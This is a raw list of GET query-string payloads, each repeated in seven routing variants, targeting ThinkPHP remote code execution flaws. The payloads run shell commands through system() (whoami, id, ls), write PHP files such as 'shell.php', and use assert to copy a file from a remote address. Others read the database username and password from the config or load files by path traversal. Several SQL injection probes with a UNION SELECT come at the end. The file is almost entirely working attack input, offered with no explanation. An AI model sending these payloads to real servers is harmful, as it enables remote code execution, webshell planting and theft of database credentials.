# GET 
?s=\index\think\Request/input&filter[]=system&data=pwd
?s=\index/\think\Request/input&filter[]=system&data=pwd
?s=index/\think\Request/input&filter[]=system&data=pwd
?s=index|think\Request/input&filter[]=system&data=pwd
?s=index/think\Request/input&filter[]=system&data=pwd
?s=index\think\Request/input&filter[]=system&data=pwd
?s=.|think\Request/input&filter[]=system&data=pwd

?s=\index\think\Request/input&filter[]=system&data=dir
?s=\index/\think\Request/input&filter[]=system&data=dir
?s=index/\think\Request/input&filter[]=system&data=dir
?s=index|think\Request/input&filter[]=system&data=dir
?s=index/think\Request/input&filter[]=system&data=dir
?s=index\think\Request/input&filter[]=system&data=dir
?s=.|think\Request/input&filter[]=system&data=dir

?s=\index\think\Request/input&filter[]=system&data=ls
?s=\index/\think\Request/input&filter[]=system&data=ls
?s=index/\think\Request/input&filter[]=system&data=ls
?s=index|think\Request/input&filter[]=system&data=ls
?s=index/think\Request/input&filter[]=system&data=ls
?s=index\think\Request/input&filter[]=system&data=ls
?s=.|think\Request/input&filter[]=system&data=ls

?s=\index\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=\index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index|think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index/think\view\driver\Php/display&content=<?php phpinfo();?>
?s=index\think\view\driver\Php/display&content=<?php phpinfo();?>
?s=.|think\view\driver\Php/display&content=<?php phpinfo();?>

?s=\index\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=\index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index|think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index/think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=index\think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>
?s=.|think\template\driver\file/write&cacheFile=shell.php&content=<?php phpinfo();?>

?s=\index\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=\index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=.|think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=id

?s=\index\think\config/get&name=database.username
?s=\index/\think\config/get&name=database.username
?s=index/\think\config/get&name=database.username
?s=index|think\config/get&name=database.username
?s=index/think\config/get&name=database.username
?s=index\think\config/get&name=database.username
?s=.|think\config/get&name=database.username

?s=\index\think\Lang/load&file=../../test.jpg
?s=\index/\think\Lang/load&file=../../test.jpg
?s=index/\think\Lang/load&file=../../test.jpg
?s=index|think\Lang/load&file=../../test.jpg
?s=index/think\Lang/load&file=../../test.jpg
?s=index\think\Lang/load&file=../../test.jpg
?s=.|think\Lang/load&file=../../test.jpg

?s=\index\think\Config/load&file=../../t.php
?s=\index/\think\Config/load&file=../../t.php
?s=index/\think\Config/load&file=../../t.php
?s=index|think\Config/load&file=../../t.php
?s=index/think\Config/load&file=../../t.php
?s=index\think\Config/load&file=../../t.php
?s=.|think\Config/load&file=../../t.php

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][0]=whoami

?s=\index\think\Request/input&filter[]=system&data=whoami
?s=\index/\think\Request/input&filter[]=system&data=whoami
?s=index/\think\Request/input&filter[]=system&data=whoami
?s=index|think\Request/input&filter[]=system&data=whoami
?s=index/think\Request/input&filter[]=system&data=whoami
?s=index\think\Request/input&filter[]=system&data=whoami
?s=.|think\Request/input&filter[]=system&data=whoami

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=tes22t.php&vars[1][1]=%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=tes22t.php&vars[1][1]=%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=tes22t.php&vars[1][1]=%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=tes22t.php&vars[1][1]=%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=tes22t.php&vars[1][1]=%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=tes22t.php&vars[1][1]=%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][0]=tes22t.php&vars[1][1]=%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=copy(%27远程地址%27,%27333.php%27)

?s=\index\think\view\driver\Think/display&template=<?php phpinfo();?>
?s=\index/\think\view\driver\Think/display&template=<?php phpinfo();?>
?s=index/\think\view\driver\Think/display&template=<?php phpinfo();?>
?s=index|think\view\driver\Think/display&template=<?php phpinfo();?>
?s=index/think\view\driver\Think/display&template=<?php phpinfo();?>
?s=index\think\view\driver\Think/display&template=<?php phpinfo();?>
?s=.|think\view\driver\Think/display&template=<?php phpinfo();?>

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=\index\think\config/get&name=database.username
?s=\index/\think\config/get&name=database.username
?s=index/\think\config/get&name=database.username
?s=index|think\config/get&name=database.username
?s=index/think\config/get&name=database.username
?s=index\think\config/get&name=database.username
?s=.|think\config/get&name=database.username

?s=\index\think\config/get&name=database.password
?s=\index/\think\config/get&name=database.password
?s=index/\think\config/get&name=database.password
?s=index|think\config/get&name=database.password
?s=index/think\config/get&name=database.password
?s=index\think\config/get&name=database.password
?s=.|think\config/get&name=database.password

?s=\index\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
?s=\index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
?s=index/\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
?s=index|think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
?s=index/think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
?s=index\think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1
?s=.|think\View/display&content=%22%3C?%3E%3C?php%20phpinfo();?%3E&data=1

?s=\index\think\Request/input&filter=phpinfo&data=1
?s=\index/\think\Request/input&filter=phpinfo&data=1
?s=index/\think\Request/input&filter=phpinfo&data=1
?s=index|think\Request/input&filter=phpinfo&data=1
?s=index/think\Request/input&filter=phpinfo&data=1
?s=index\think\Request/input&filter=phpinfo&data=1
?s=.|think\Request/input&filter=phpinfo&data=1

?s=\index\think\Request/input&filter=system&data=cmd
?s=\index/\think\Request/input&filter=system&data=cmd
?s=index/\think\Request/input&filter=system&data=cmd
?s=index|think\Request/input&filter=system&data=cmd
?s=index/think\Request/input&filter=system&data=cmd
?s=index\think\Request/input&filter=system&data=cmd
?s=.|think\Request/input&filter=system&data=cmd

?s=\index\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=\index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=index/\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=index|think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=index/think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=index\think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E
?s=.|think\template\driver\file/write&cacheFile=shell.php&content=%3C?php%20phpinfo();?%3E

?s=\index\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=\index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=index/\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=index|think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=index/think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=index\think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E
?s=.|think\view\driver\Php/display&content=%3C?php%20phpinfo();?%3E

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

?s=\index\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=\index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index|think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index/think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=index\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
?s=.|think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

?s=\index\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=\index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index|think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index/think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=index\think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd
?s=.|think\Container/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=cmd

?s=\index\think\module/action/param1/${@phpinfo()}
?s=\index/\think\module/action/param1/${@phpinfo()}
?s=index/\think\module/action/param1/${@phpinfo()}
?s=index|think\module/action/param1/${@phpinfo()}
?s=index/think\module/action/param1/${@phpinfo()}
?s=index\think\module/action/param1/${@phpinfo()}
?s=.|think\module/action/param1/${@phpinfo()}

?s=\index\think\Module/Action/Param/${@phpinfo()}
?s=\index/\think\Module/Action/Param/${@phpinfo()}
?s=index/\think\Module/Action/Param/${@phpinfo()}
?s=index|think\Module/Action/Param/${@phpinfo()}
?s=index/think\Module/Action/Param/${@phpinfo()}
?s=index\think\Module/Action/Param/${@phpinfo()}
?s=.|think\Module/Action/Param/${@phpinfo()}

?s=\index\think/module/aciton/param1/${@print(THINK_VERSION)}
?s=\index/\think/module/aciton/param1/${@print(THINK_VERSION)}
?s=index/\think/module/aciton/param1/${@print(THINK_VERSION)}
?s=index|think/module/aciton/param1/${@print(THINK_VERSION)}
?s=index/think/module/aciton/param1/${@print(THINK_VERSION)}
?s=index\think/module/aciton/param1/${@print(THINK_VERSION)}
?s=.|think/module/aciton/param1/${@print(THINK_VERSION)}

?s=\Index\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=\Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=Index|think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=Index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=Index\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?s=\index\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=\index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index\think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=.|think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

?s=\index\think\request/input?data[]=phpinfo()&filter=assert
?s=\index/\think\request/input?data[]=phpinfo()&filter=assert
?s=index/\think\request/input?data[]=phpinfo()&filter=assert
?s=index|think\request/input?data[]=phpinfo()&filter=assert
?s=index/think\request/input?data[]=phpinfo()&filter=assert
?s=index\think\request/input?data[]=phpinfo()&filter=assert
?s=.|think\request/input?data[]=phpinfo()&filter=assert

?s=\index\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=\index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index|think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index/think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=index\think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()
?s=.|think\Container/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

?s=\index\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=\index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index|think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index/think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=index\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1
?s=.|think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

?s=\index\think\Request/input&filter[]=phpinfo&data=-1
?s=\index/\think\Request/input&filter[]=phpinfo&data=-1
?s=index/\think\Request/input&filter[]=phpinfo&data=-1
?s=index|think\Request/input&filter[]=phpinfo&data=-1
?s=index/think\Request/input&filter[]=phpinfo&data=-1
?s=index\think\Request/input&filter[]=phpinfo&data=-1
?s=.|think\Request/input&filter[]=phpinfo&data=-1

?s=/home/shopcart/getPricetotal/tag/1%27

?s=/home/shopcart/getpriceNum/id/1%27

?s=/home/user/cut/id/1%27

?s=/home/service/index/id/1%27

?s=/home/pay/chongzhi/orderid/1%27

?s=/home/pay/index/orderid/1%27

?s=/home/order/complete/id/1%27

?s=/home/order/detail/id/1%27

?s=/home/order/cancel/id/1%27

?s=/home/pay/index/orderid/1%27)%20UNION%20ALL%20SELECT%20md5(233)--+


